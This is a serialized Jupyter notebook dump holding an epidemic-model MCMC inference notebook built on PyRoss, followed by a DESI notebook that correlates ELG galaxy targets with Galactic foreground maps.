Nf)\n\n # plt.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='S', lw=4)\n plt.plot(t, np.sum(data_array[:, M:2*M], axis=1), '-o', label='Exposed', lw=2)\n plt.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), '-o', label='Infected', lw=2)\n plt.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), '-o', label='Deaths', lw=2)\n #plt.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=2)\n\n plt.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')\n plt.legend()\n plt.show()\n\n fig,axs = plt.subplots(1,2, figsize=(12, 5), dpi=80, facecolor='w', edgecolor='k')\n ax = axs[0]\n ax.plot(t[1:],np.diff(np.sum(data_array[:, 3*M:4*M], axis=1)),'o-',label='death increments', lw=1)\n ax.legend(loc='upper right') ; # plt.show()\n\n ax = axs[1]\n ax.plot(t,np.sum(data_array[:, 3*M:4*M], axis=1),'o-',label='deaths',ms=3)\n ax.legend() ; \n\n plt.show()\n\n\ndef plotMAP(res,data_array,M,N,estimator,Nf_start,Tf_inference,fineData):\n print('**beta(bare units)',res['params_dict']['beta']*fineData)\n print('**logLik',res['log_likelihood'],'true was',logpTrue)\n print('\\n')\n print(res)\n\n fig,axs = plt.subplots(1,3, figsize=(15, 7), dpi=80, facecolor='w', edgecolor='k')\n plt.subplots_adjust(wspace=0.3)\n #plt.rc('text', usetex=True)\n plt.rc('font', family='serif', size=12)\n t = np.linspace(0, Tf/fineData, Nf)\n\n ax = axs[0]\n\n #plt.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='S', lw=4)\n ax.plot(t, np.sum(data_array[:, M:2*M], axis=1), 'o', label='Exposed', lw=2)\n ax.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), 'o', label='Infected', lw=2)\n ax.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), 'o', label='Deaths', lw=2)\n #plt.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=2)\n\n tt = np.linspace(Nf_start, Tf, Nf-Nf_start,)/fineData\n xm = estimator.integrate(res['x0'], Nf_start, Tf, Nf-Nf_start, dense_output=False)\n #plt.plot(tt, np.sum(xm[:, :M], axis=1), '-x', label='S-MAP', lw=2, ms=3)\n ax.plot(tt, np.sum(xm[:, M:2*M], axis=1), '-x', color='C0',label='E-MAP', lw=2, ms=3)\n ax.plot(tt, np.sum(xm[:, 2*M:3*M], axis=1), '-x', color='C1',label='I-MAP', lw=2, ms=3)\n ax.plot(tt, np.sum(xm[:, 3*M:4*M], axis=1), '-x', color='C2',label='D-MAP', lw=2, ms=3)\n #plt.plot(tt, N-np.sum(xm[:, :4*M], axis=1), '-o', label='R-MAP', lw=2)\n\n ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')\n ax.legend()\n\n ax = axs[1]\n ax.plot(t[1:], np.diff(np.sum(data_array[:, 3*M:4*M], axis=1)), '-o', label='death incs', lw=2)\n ax.plot(tt[1:], np.diff(np.sum(xm[:, 3*M:4*M], axis=1)), '-x', label='MAP', lw=2, ms=3)\n ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')\n ax.legend()\n\n ax = axs[2]\n\n ax.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='Sus', lw=1.5, ms=3)\n #plt.plot(t, np.sum(data_array[:, M:2*M], axis=1), '-o', label='Exposed', lw=2)\n #plt.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), '-o', label='Infected', lw=2)\n #plt.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), '-o', label='Deaths', lw=2)\n ax.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=1.5, ms=3)\n\n #infResult = res\n tt = np.linspace(Nf_start, Tf, Nf-Nf_start,)/fineData\n xm = estimator.integrate(res['x0'], Nf_start, Tf, Nf-Nf_start, dense_output=False)\n ax.plot(tt, np.sum(xm[:, :M], axis=1), '-x', label='S-MAP', lw=2, ms=3)\n #plt.plot(tt, np.sum(xm[:, M:2*M], axis=1), '-x', label='E-MAP', lw=2, ms=3)\n #plt.plot(tt, np.sum(xm[:, 2*M:3*M], axis=1), '-x', label='I-MAP', lw=2, ms=3)\n #plt.plot(tt, np.sum(xm[:, 3*M:4*M], axis=1), '-x', label='D-MAP', lw=2, ms=3)\n ax.plot(tt, N-np.sum(xm[:, :4*M], axis=1), '-x', label='R-MAP', lw=1.5, ms=3)\n\n ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')\n ax.legend()\n plt.show()\n \n\n \ndef plotMCtrace(selected_dims, sampler, numTrace=None):\n # Plot the trace for these dimensions:\n plot_dim = len(selected_dims)\n plt.rcParams.update({'font.size': 14})\n fig, axes = plt.subplots(plot_dim, figsize=(12, plot_dim), sharex=True)\n samples = sampler.get_chain()\n if numTrace == None : numTrace = np.shape(samples)[1] ## corrected index\n for ii,dd in enumerate(selected_dims):\n ax = axes[ii]\n ax.plot(samples[:, :numTrace , dd], \"k\", alpha=0.3)\n ax.set_xlim(0, len(samples))\n axes[-1].set_xlabel(\"step number\");\n plt.show(fig)\n plt.close()\n\ndef plotPosteriors(estimator,obsData, fltrDeath, Tf_inference,param_priors, init_priors,contactMatrix,\n infResult,parameters_true,trueInit) :\n ## used for prior pdfs\n (likFun,priFun,dimFlat) = pyross.evidence.latent_get_parameters(estimator,\n obsData, fltrDeath, Tf_inference,\n param_priors, init_priors, \n contactMatrix,\n #intervention_fun=interventionFn,\n tangent=False,\n )\n xVals = np.linspace(parameters_true['beta']*0.5,parameters_true['beta']*1.5,100)\n\n betas = [ rr['params_dict']['beta'] for rr in result_mcmc ]\n plt.hist(betas,density=True,color='lightblue',label='posterior')\n yVal=2\n plt.plot([infResult['params_dict']['beta']],[2*yVal],'bs',label='MAP',ms=10)\n plt.plot([parameters_true['beta']],[yVal],'ro',label='true',ms=10)\n\n\n ## this is a bit complicated, it just finds the prior for beta from the infResult\n var='beta'\n jj = infResult['param_keys'].index(var)\n xInd = infResult['param_guess_range'][jj]\n #print(jj,xInd)\n pVals = []\n for xx in xVals :\n flatP = np.zeros( dimFlat )\n flatP[xInd] = xx\n pdfAll = np.exp( priFun.logpdf(flatP) )\n pVals.append( pdfAll[xInd] )\n plt.plot(xVals,pVals,color='darkgreen',label='prior')\n\n\n plt.xlabel(var)\n plt.ylabel('pdf')\n plt.legend()\n\n labs=['init S','init E','init I']\n nPanel=3\n fig,axs = plt.subplots(1,nPanel,figsize=(14,4))\n for ii in range(nPanel) : \n ax = axs[ii]\n yVal=1.0/popN\n xs = [ rr['x0'][ii] for rr in result_mcmc ]\n ax.hist(xs,color='lightblue',density=True)\n ax.plot([infResult['x0'][ii]],yVal,'bs',label='true')\n ax.plot([trueInit[ii]],yVal,'ro',label='true')\n\n\n ## this is a bit complicated, it just finds the prior for beta from the infResult\n ## axis ranges\n xMin = np.min(xs)*0.8\n xMax = np.max(xs)*1.2\n xVals = np.linspace(xMin,xMax,100)\n\n ## this ID is a negative number because the init params are the end of the 'flat' param array\n paramID = ii-nPanel \n pVals = []\n for xx in xVals :\n flatP = np.zeros( dimFlat )\n flatP[paramID] = xx\n pdfAll = np.exp( priFun.logpdf(flatP) )\n pVals.append( pdfAll[paramID] )\n ax.plot(xVals,pVals,color='darkgreen',label='prior')\n\n #plt.xlabel(var)\n ax.set_xlabel(labs[ii])\n ax.set_ylabel('pdf')\n ax.yaxis.set_ticklabels([])\n\n plt.show()\n", "_____no_output_____" ] ], [ [ "### synthetic data", "_____no_output_____" ] ], [ [ "if loadTraj :\n ipFile = fileRoot+'-stochTraj.npy'\n syntheticData = np.load(ipFile)\n print('loading trajectory from',ipFile)\nelse :\n ticTime = time.time()\n syntheticData = synth_fns.make_stochastic_traj(Tf,Nf,trajSeed,model_dict,leapEps)\n tocTime = time.time() - ticTime\n print('traj generation time',tocTime,'secs')\n\nnp.save(fileRoot+'-stochTraj.npy',syntheticData)\n\nNf_start = synth_fns.get_start_time(syntheticData, popN, fracDeaths)\nprint('inf starts at timePoint',Nf_start)", "{'beta': 0.035, 'gE': 0.35000000000000003, 'gR': 0.245, 'gD': 0.005, 'seed': 18}\ntraj generation time 41.87377667427063 secs\ninf starts at timePoint 27\n" ], [ "plotTraj(cohortsM,syntheticData,Nf_start,Tf_inference,fineData)", "_____no_output_____" ] ], [ [ "### basic inference (estimator) setup\n(including computation of likelihood for the true parameters)", "_____no_output_____" ] ], [ [ "[estimator,fltrDeath,obsData,trueInit] = synth_fns.get_estimator(isHighAccuracy,model_dict,syntheticData, popN, Nf_start, Nf_inference,)\n\n## compute log-likelihood of true params\nlogpTrue = -estimator.minus_logp_red(parameters_true, trueInit, obsData, fltrDeath, Tf_inference, \n contactMatrix, tangent=False)\nprint('**logLikTrue',logpTrue,'\\n')\n\nprint('death data\\n',obsData,'length',np.size(obsData),Nf_inference)", "setting high-accuracy for likelihood\n**logLikTrue -40.72311526408154 \n\ndeath data\n [[2365.]\n [2767.]\n [3313.]\n [3839.]\n [4438.]\n [5060.]\n [5722.]\n [6501.]\n [7253.]] length 9 9\n" ] ], [ [ "### priors", "_____no_output_____" ] ], [ [ "[param_priors,init_priors] = synth_fns.get_priors(model_dict,betaPriorOffset,betaPriorLogNorm,fracDeaths,estimator)\nprint('Prior Params:',param_priors)\nprint('Prior Inits:')\npprint.pprint(init_priors)\nprint('trueBeta',parameters_true['beta'])\nprint('trueInit',trueInit)", "Prior Params: {'beta': {'mean': 0.028000000000000004, 'std': 0.014000000000000002, 'bounds': [0.0001, 0.14], 'prior_fun': 'truncnorm'}}\nPrior Inits:\n{'independent': {'bounds': [[72000.0, 1000000.0],\n [10100.251257867601, 1010025.12578676],\n [7899.748742132397, 789974.8742132396]],\n 'fltr': array([ True, True, True, False]),\n 'mean': array([720000. , 101002.51257868, 78997.48742132]),\n 'prior_fun': 'truncnorm',\n 'std': array([33667.50419289, 33667.50419289, 26332.49580711])}}\ntrueBeta 0.035\ntrueInit [709875. 87267. 80333. 2365.]\n" ] ], [ [ "### inference (MAP)", "_____no_output_____" ] ], [ [ "infResult = synth_fns.do_inf(estimator, obsData, fltrDeath, syntheticData, \n popN, Tf_inference, infSeed, param_priors,init_priors, model_dict, inf_atol)", "Starting global minimisation ...\n(32_w,64)-aCMA-ES (mu_w=17.6,w_1=11%) in dimension 4 (seed=21, Sat May 1 13:03:38 2021)\nIterat #Fevals function value axis ratio sigma min&max std t[m:s]\n 1 64 7.704383942908420e+01 1.0e+00 1.00e+00 1e-02 3e+04 0:01.6\n 2 128 7.252563298872531e+01 1.8e+00 9.68e-01 9e-03 4e+04 0:03.1\n 3 192 7.163917093426959e+01 3.1e+00 8.23e-01 6e-03 3e+04 0:04.7\n 5 320 7.096383466301374e+01 7.6e+00 6.61e-01 3e-03 2e+04 0:07.8\n 8 512 7.090657777596969e+01 1.6e+01 6.43e-01 2e-03 1e+04 0:12.5\n 12 768 7.080727508881648e+01 2.2e+01 4.26e-01 3e-04 3e+03 0:18.7\n 15 960 7.080598224196227e+01 2.0e+01 3.49e-01 1e-04 1e+03 0:23.4\nOptimal value (global minimisation): 70.80598224196227\nStarting local minimisation...\nOptimal value (local minimisation): 70.80582259847648\n" ], [ "#pprint.pprint(infResult)\nprint('MAP likelihood',infResult['log_likelihood'],'true',logpTrue)\nprint('MAP beta',infResult['params_dict']['beta'],'true',parameters_true['beta'])", "MAP likelihood -40.347160920804455 true -40.72311526408154\nMAP beta 0.03188011492363837 true 0.035\n" ] ], [ [ "### plot MAP trajectory", "_____no_output_____" ] ], [ [ "plotMAP(infResult,syntheticData,cohortsM,popN,estimator,Nf_start,Tf_inference,fineData)", "**beta(bare units) 0.12752045969455347\n**logLik -40.347160920804455 true was -40.72311526408154\n\n\n{'params_dict': {'beta': 0.03188011492363837, 'gE': 0.35000000000000003, 'gR': 0.245, 'gD': 0.005, 'seed': 18}, 'x0': array([725209.60575166, 101859.7992907 , 76606.06026326, 2365. ]), 'flat_params': array([3.18801149e-02, 7.25209606e+05, 1.01859799e+05, 7.66060603e+04]), 'log_posterior': -70.80582259847648, 'log_prior': -30.458661677672026, 'log_likelihood': -40.347160920804455, 'param_keys': ['beta'], 'param_guess_range': [0], 'is_scale_parameter': [False], 'param_length': 1, 'scaled_param_guesses': [], 'init_flags': [False, True], 'init_fltrs': [None, array([[1., 0., 0., 0.],\n [0., 1., 0., 0.],\n [0., 0., 1., 0.]])], 'prior': <pyross.utils_python.Prior object at 0x7f612484fe50>}\n" ] ], [ [ "#### slice of likelihood \n(note this is not the posterior, hence MAP is not exactly at the peak)", "_____no_output_____" ] ], [ [ "## range for beta (relative to MAP)\nrangeParam = 0.1\n[bVals,likVals] = synth_fns.sliceLikelihood(rangeParam,infResult,\n estimator,obsData,fltrDeath,contactMatrix,Tf_inference)\n\n#print('logLiks',likVals,logp)\nplt.plot(bVals , likVals, 'o-')\nplt.plot(infResult['params_dict']['beta'],infResult['log_likelihood'],'s',ms=6)\nplt.show()", "_____no_output_____" ] ], [ [ "### MCMC", "_____no_output_____" ] ], [ [ "sampler = synth_fns.do_mcmc(mcSamples, nProcMCMC, estimator, Tf_inference, infResult, \n obsData, fltrDeath, param_priors, init_priors, \n model_dict,infSeed)", "est map [3.18801149e-02 7.25209606e+05 1.01859799e+05 7.66060603e+04] 4\n" ], [ "plotMCtrace([0,2,3], sampler)\nresult_mcmc = synth_fns.load_mcmc_result(estimator, obsData, fltrDeath, sampler, param_priors, init_priors, model_dict)\n\nprint('result shape',np.shape(result_mcmc))\nprint('last sample\\n',result_mcmc[-1])", "_____no_output_____" ] ], [ [ "#### save the result", "_____no_output_____" ] ], [ [ "if saveMC :\n opFile = fileRoot + \"-mcmc.pik\"\n print('opf',opFile)\n with open(opFile, 'wb') as f: \n pickle.dump([infResult,result_mcmc],f)", "opf dataSynthInfTest-pop1e6-win2-mcmc.pik\n" ] ], [ [ "#### estimate MCMC autocorrelation", "_____no_output_____" ] ], [ [ "# these are the estimated autocorrelation times for the sampler\n# (it likes runs ~50 times longer than this...)\npp = sampler.get_log_prob()\nnSampleTot = np.shape(pp)[0]\n#print('correl',sampler.get_autocorr_time(discard=int(nSampleTot/3)))\nprint('nSampleTot',nSampleTot)", "nSampleTot 5000\n" ] ], [ [ "#### plot posterior distributions", "_____no_output_____" ] ], [ [ "plotPosteriors(estimator,obsData, fltrDeath, Tf_inference,param_priors, init_priors,contactMatrix,\n infResult,parameters_true,trueInit)\n", "_____no_output_____" ] ], [ [ "### analyse posterior for beta", "_____no_output_____" ] ], [ [ "betas = [ rr['params_dict']['beta'] for rr in result_mcmc ]\npostMeanBeta = np.mean(betas)\npostStdBeta = np.std(betas)\npostCIBeta = [ np.percentile(betas,2.5) , np.percentile(betas,97.5)]\n\nprint(\"beta: true {b:.5f} MAP {m:.5f}\".format(b=parameters_true['beta'],m=infResult['params_dict']['beta']))\nprint(\"post: mean {m:.5f} std {s:.5f} CI95: {l:.5f} {u:.5f}\".format(m=postMeanBeta,\n s=postStdBeta,\n l=postCIBeta[0],u=postCIBeta[1]))\n\n", "beta: true 0.03500 MAP 0.03188\npost: mean 0.03242 std 0.00305 CI95: 0.02698 0.03879\n" ] ], [ [ "### posterior correlations for initial conditions", "_____no_output_____" ] ], [ [ "sis = np.array( [ rr['x0'][0] for rr in result_mcmc ] )/popN\neis = np.array( [ rr['x0'][1] for rr in result_mcmc ] )/popN\niis = np.array( [ rr['x0'][2] for rr in result_mcmc ] )/popN\nbetas = [ rr['params_dict']['beta'] for rr in result_mcmc ]\n\nfig,axs = plt.subplots(1,3,figsize=(15,4))\nplt.subplots_adjust(wspace=0.35)\n\nax = axs[0]\n\nax.plot(eis,iis,'o',ms=2)\nax.set_xlabel('E0')\nax.set_ylabel('I0')\n\nax = axs[1]\n\nax.plot(1-eis-iis-sis,sis,'o',ms=2)\nax.set_ylabel('S0')\nax.set_xlabel('R0')\n\nax = axs[2]\nax.plot(1-eis-iis-sis,betas,'o',ms=2)\nax.set_ylabel('beta')\nax.set_xlabel('R0')\n\nplt.show()", "_____no_output_____" ], [ "def forecast(result_mcmc, nsamples, Nf_start, Tf_inference, Nf_inference, estimator, obs, fltr, contactMatrix):\n trajs = []\n #x = (data_array[Nf_start:Nf_start+Nf_inference])\n #obs=np.einsum('ij,kj->ki', fltr, x)\n\n # this should pick up the right number of traj, equally spaced\n totSamples = len(result_mcmc)\n skip = int(totSamples/nsamples)\n modulo = totSamples % skip\n #print(modulo,skip)\n \n for sample_res in result_mcmc[modulo::skip]: \n endpoints = estimator.sample_endpoints(obs, fltr, Tf_inference, sample_res, 1, contactMatrix=contactMatrix)\n xm = estimator.integrate(endpoints[0], Nf_start+Tf_inference, Tf, Nf-Tf_inference-Nf_start, dense_output=False)\n trajs.append(xm)\n\n return trajs \n\ndef plot_forecast(allTraj, data_array, nsamples, Tf,Nf, Nf_start, Tf_inference, Nf_inference, M,\n estimator, obs, contactMatrix):\n #x = (data_array[Tf_start:Tf_start+Nf_inference]).astype('float') \n #obs=np.einsum('ij,kj->ki', fltr, x)\n \n #samples = estimator.sample_endpoints(obs, fltr, Tf_inference, res, nsamples, contactMatrix=contactMatrix)\n time_points = np.linspace(0, Tf, Nf)\n\n fig = plt.figure(num=None, figsize=(10, 8), dpi=80, facecolor='w', edgecolor='k')\n plt.rcParams.update({'font.size': 22})\n #for x_start in samples: \n for traj in allTraj: \n #xm = estimator.integrate(x_start, Tf_start+Tf_inference, Tf, Nf-Tf_inference-Tf_start, dense_output=False)\n # plt.plot(time_points[Tf_inference+Tf_start:], np.sum(xm[:, M:2*M], axis=1), color='grey', alpha=0.1)\n # plt.plot(time_points[Tf_inference+Tf_start:], np.sum(xm[:, 2*M:3*M], axis=1), color='grey', alpha=0.1)\n \n incDeaths = np.diff( np.sum(traj[:, 3*M:4*M], axis=1) )\n \n plt.plot(time_points[1+Tf_inference+Nf_start:], incDeaths, color='grey', alpha=0.2)\n\n # plt.plot(time_points, np.sum(data_array[:, M:2*M], axis=1), label='True E')\n # plt.plot(time_points, np.sum(data_array[:, 2*M:3*M], axis=1), label='True I')\n \n incDeathsObs = np.diff( np.sum(data_array[:, 3*M:4*M], axis=1) )\n\n plt.plot(time_points[1:],incDeathsObs, 'ko', label='True D')\n plt.axvspan(Nf_start, Tf_inference+Nf_start, \n label='Used for inference',\n alpha=0.3, color='dodgerblue')\n plt.xlim([0, Tf])\n plt.legend() \n plt.show()", "_____no_output_____" ], [ "nsamples = 40\nforeTraj = forecast(result_mcmc, nsamples, Nf_start, Tf_inference, Nf_inference, \n estimator, obsData, fltrDeath, contactMatrix)\nprint(len(foreTraj))\n\nforeTraj = np.array( foreTraj )\nnp.save(fileRoot+'-foreTraj.npy',foreTraj)", "40\n" ], [ "plot_forecast(foreTraj, syntheticData, nsamples, Tf,Nf, Nf_start, Tf_inference, Nf_inference, cohortsM,\n estimator, obsData, contactMatrix)", "_____no_output_____" ], [ "print(Nf_inference)", "9\n" ], [ "print(len(result_mcmc))", "528\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
cb1c03ba9653d63e42b90575bfede0eadf304b51
938,131
ipynb
Jupyter Notebook
Sandbox/ELGgalforeground.ipynb
echaussidon/LSS
205ce48a288acacbd41358e6d0215f4aff355049
[ "BSD-3-Clause" ]
8
2017-04-12T14:52:26.000Z
2022-01-04T08:54:18.000Z
Sandbox/ELGgalforeground.ipynb
echaussidon/LSS
205ce48a288acacbd41358e6d0215f4aff355049
[ "BSD-3-Clause" ]
13
2017-10-26T22:06:24.000Z
2022-03-31T15:29:06.000Z
Sandbox/ELGgalforeground.ipynb
echaussidon/LSS
205ce48a288acacbd41358e6d0215f4aff355049
[ "BSD-3-Clause" ]
13
2015-10-26T17:30:10.000Z
2022-02-22T09:24:38.000Z
296.314277
85,224
0.919926
[ [ [ "'''\nNotebook to specifically study correlations between ELG targets and Galactic foregrounds\n\nMuch of this made possible and copied from script shared by Anand Raichoor\n\nRun in Python 3; install pymangle, fitsio, healpy locally: pip install --user fitsio; pip install --user healpy; git clone https://github.com/esheldon/pymangle...\n\n'''\n\nimport fitsio\nimport numpy as np\n#from desitarget.io import read_targets_in_hp, read_targets_in_box, read_targets_in_cap\nimport astropy.io.fits as fits\nimport glob\nimport os\nimport healpy as hp\nfrom matplotlib import pyplot as plt\n", "_____no_output_____" ], [ "print(nest)", "True\n" ], [ "#Some information is in pixelized map\n#get nside and nest from header\npixfn = '/project/projectdirs/desi/target/catalogs/dr8/0.31.1/pixweight/pixweight-dr8-0.31.1.fits'\nhdr = fits.getheader(pixfn,1)\nnside,nest = hdr['HPXNSIDE'],hdr['HPXNEST']\nprint(fits.open(pixfn)[1].columns.names)\nhpq = fitsio.read(pixfn)", "['HPXPIXEL', 'FRACAREA', 'STARDENS', 'EBV', 'PSFDEPTH_G', 'PSFDEPTH_R', 'PSFDEPTH_Z', 'GALDEPTH_G', 'GALDEPTH_R', 'GALDEPTH_Z', 'PSFDEPTH_W1', 'PSFDEPTH_W2', 'PSFSIZE_G', 'PSFSIZE_R', 'PSFSIZE_Z', 'ELG', 'LRG', 'QSO', 'BGS_ANY', 'MWS_ANY', 'ALL', 'STD_FAINT', 'STD_BRIGHT', 'LRG_1PASS', 'LRG_2PASS', 'BGS_FAINT', 'BGS_BRIGHT', 'BGS_WISE', 'MWS_BROAD', 'MWS_MAIN_RED', 'MWS_MAIN_BLUE', 'MWS_WD', 'MWS_NEARBY']\n" ], [ "#get MC efficiency\nmcf = fitsio.read(os.getenv('SCRATCH')+'/ELGMCeffHSCHP.fits')\nmmc = np.mean(mcf['EFF'])\nmcl = np.zeros(12*nside*nside)\nfor i in range(0,len(mcf)):\n pix = mcf['HPXPIXEL'][i]\n mcl[pix] = mcf['EFF'][i]/mmc", "_____no_output_____" ], [ "#ELGs were saved here\nelgf = os.getenv('SCRATCH')+'/ELGtargetinfo.fits'", "_____no_output_____" ], [ "#for healpix\ndef radec2thphi(ra,dec):\n return (-dec+90.)*np.pi/180.,ra*np.pi/180.", "_____no_output_____" ], [ "#read in ELGs, put them into healpix\nfelg = fitsio.read(elgf)\ndth,dphi = radec2thphi(felg['RA'],felg['DEC'])\ndpix = hp.ang2pix(nside,dth,dphi,nest)", "_____no_output_____" ], [ "lelg = len(felg)\nprint(lelg)", "47256516\n" ], [ "#full random file is available, easy to read some limited number; take 1.5x ELG to start with\nrall = fitsio.read('/project/projectdirs/desi/target/catalogs/dr8/0.31.0/randomsall/randoms-inside-dr8-0.31.0-all.fits',rows=np.arange(int(1.5*lelg))\n )\nrall_header = fitsio.read_header('/project/projectdirs/desi/target/catalogs/dr8/0.31.0/randomsall/randoms-inside-dr8-0.31.0-all.fits',ext=1)", "_____no_output_____" ], [ "#cut randoms to ELG footprint\nkeep = (rall['NOBS_G']>0) & (rall['NOBS_R']>0) & (rall['NOBS_Z']>0)\nprint(len(rall[keep]))\nelgbits = [1,5,6,7,11,12,13]\nkeepelg = keep\nfor bit in elgbits:\n keepelg &= ((rall['MASKBITS'] & 2**bit)==0)\nprint(len(rall[keepelg]))\nrelg = rall[keepelg]", "67762950\n64567641\n" ], [ "print(rall_header)\n#write out randoms\n#fitsio.write(os.getenv('SCRATCH')+'/ELGrandoms.fits',relg,overwrite=True)", "\nXTENSION= 'BINTABLE' / binary table extension\nBITPIX = 8 / 8-bit bytes\nNAXIS = 2 / 2-dimensional binary table\nNAXIS1 = 115 / width of table in bytes\nNAXIS2 = 508311875 / number of rows in table\nPCOUNT = 0 / size of special data area\nGCOUNT = 1 / one data group (required keyword)\nTFIELDS = 29 / number of fields in each row\nTTYPE1 = 'RA' / label for field 1\nTFORM1 = 'D' / data format of field: 8-byte DOUBLE\nTTYPE2 = 'DEC' / label for field 2\nTFORM2 = 'D' / data format of field: 8-byte DOUBLE\nTTYPE3 = 'BRICKNAME' / label for field 3\nTFORM3 = '8A' / data format of field: ASCII Character\nTTYPE4 = 'NOBS_G' / label for field 4\nTFORM4 = 'I' / data format of field: 2-byte INTEGER\nTTYPE5 = 'NOBS_R' / label for field 5\nTFORM5 = 'I' / data format of field: 2-byte INTEGER\nTTYPE6 = 'NOBS_Z' / label for field 6\nTFORM6 = 'I' / data format of field: 2-byte INTEGER\nTTYPE7 = 'PSFDEPTH_G' / label for field 7\nTFORM7 = 'E' / data format of field: 4-byte REAL\nTTYPE8 = 'PSFDEPTH_R' / label for field 8\nTFORM8 = 'E' / data format of field: 4-byte REAL\nTTYPE9 = 'PSFDEPTH_Z' / label for field 9\nTFORM9 = 'E' / data format of field: 4-byte REAL\nTTYPE10 = 'GALDEPTH_G' / label for field 10\nTFORM10 = 'E' / data format of field: 4-byte REAL\nTTYPE11 = 'GALDEPTH_R' / label for field 11\nTFORM11 = 'E' / data format of field: 4-byte REAL\nTTYPE12 = 'GALDEPTH_Z' / label for field 12\nTFORM12 = 'E' / data format of field: 4-byte REAL\nTTYPE13 = 'PSFDEPTH_W1' / label for field 13\nTFORM13 = 'E' / data format of field: 4-byte REAL\nTTYPE14 = 'PSFDEPTH_W2' / label for field 14\nTFORM14 = 'E' / data format of field: 4-byte REAL\nTTYPE15 = 'PSFSIZE_G' / label for field 15\nTFORM15 = 'E' / data format of field: 4-byte REAL\nTTYPE16 = 'PSFSIZE_R' / label for field 16\nTFORM16 = 'E' / data format of field: 4-byte REAL\nTTYPE17 = 'PSFSIZE_Z' / label for field 17\nTFORM17 = 'E' / data format of field: 4-byte REAL\nTTYPE18 = 'APFLUX_G' / label for field 18\nTFORM18 = 'E' / data format of field: 4-byte REAL\nTTYPE19 = 'APFLUX_R' / label for field 19\nTFORM19 = 'E' / data format of field: 4-byte REAL\nTTYPE20 = 'APFLUX_Z' / label for field 20\nTFORM20 = 'E' / data format of field: 4-byte REAL\nTTYPE21 = 'APFLUX_IVAR_G' / label for field 21\nTFORM21 = 'E' / data format of field: 4-byte REAL\nTTYPE22 = 'APFLUX_IVAR_R' / label for field 22\nTFORM22 = 'E' / data format of field: 4-byte REAL\nTTYPE23 = 'APFLUX_IVAR_Z' / label for field 23\nTFORM23 = 'E' / data format of field: 4-byte REAL\nTTYPE24 = 'MASKBITS' / label for field 24\nTFORM24 = 'I' / data format of field: 2-byte INTEGER\nTTYPE25 = 'WISEMASK_W1' / label for field 25\nTFORM25 = 'B' / data format of field: BYTE\nTTYPE26 = 'WISEMASK_W2' / label for field 26\nTFORM26 = 'B' / data format of field: BYTE\nTTYPE27 = 'EBV' / label for field 27\nTFORM27 = 'E' / data format of field: 4-byte REAL\nTTYPE28 = 'PHOTSYS' / label for field 28\nTFORM28 = '1A' / data format of field: ASCII Character\nTTYPE29 = 'HPXPIXEL' / label for field 29\nTFORM29 = 'K' / data format of field: 8-byte INTEGER\nEXTNAME = 'RANDOMS' / name of this binary table extension\nDEPNAM00= 'desitarget' / \nDEPVER00= '0.31.0' / \nDEPNAM01= 'desitarget-git' / \nDEPVER01= '0.31.0' / \nDEPNAM02= 'input-data-release' / \nDEPVER02= '/global/project/projectdirs/cosmo/work/legacysurvey/dr8' / \nDEPNAM03= 'photcat' / \nDEPVER03= 'dr8' / \nHPXNSIDE= 64 / \nHPXNEST = T / \nSUPP = F / \nDENSITY = 25000 / \nAPRAD = 0.75 / \nRESOLVE = T / \n" ], [ "#put randoms into healpix\nrth,rphi = radec2thphi(relg['RA'],relg['DEC'])\nrpix = hp.ang2pix(nside,rth,rphi,nest=nest)", "_____no_output_____" ], [ "#let's define split into bmzls, DECaLS North, DECaLS South (Anand has tools to make distinct DES region as well)\n#one function to do directly, the other just for the indices\n\nprint(np.unique(felg['PHOTSYS']))\n#bmzls = b'N' #if in desi environment\nbmzls = 'N' #if in Python 3; why the difference? Maybe version of fitsio?\n\ndef splitcat(cat):\n NN = cat['PHOTSYS'] == bmzls\n d1 = (cat['PHOTSYS'] != bmzls) & (cat['RA'] < 300) & (cat['RA'] > 100) & (cat['DEC'] > -20)\n d2 = (d1==0) & (NN ==0) & (cat['DEC'] > -30)\n return cat[NN],cat[d1],cat[d2]\n\ndef splitcat_ind(cat):\n NN = cat['PHOTSYS'] == bmzls\n d1 = (cat['PHOTSYS'] != bmzls) & (cat['RA'] < 300) & (cat['RA'] > 100) & (cat['DEC'] > -20)\n d2 = (d1==0) & (NN ==0) & (cat['DEC'] > -30)\n return NN,d1,d2", "['N' 'S']\n" ], [ "#indices for split\ndbml,ddnl,ddsl = splitcat_ind(felg)\nrbml,rdnl,rdsl = splitcat_ind(relg)\nprint(len(felg[dbml]),len(felg[ddnl]),len(felg[ddsl]))", "12726178 14094848 13407623\n" ], [ "#put into full sky maps (probably not necessary but easier to keep straight down the line)\npixlrbm = 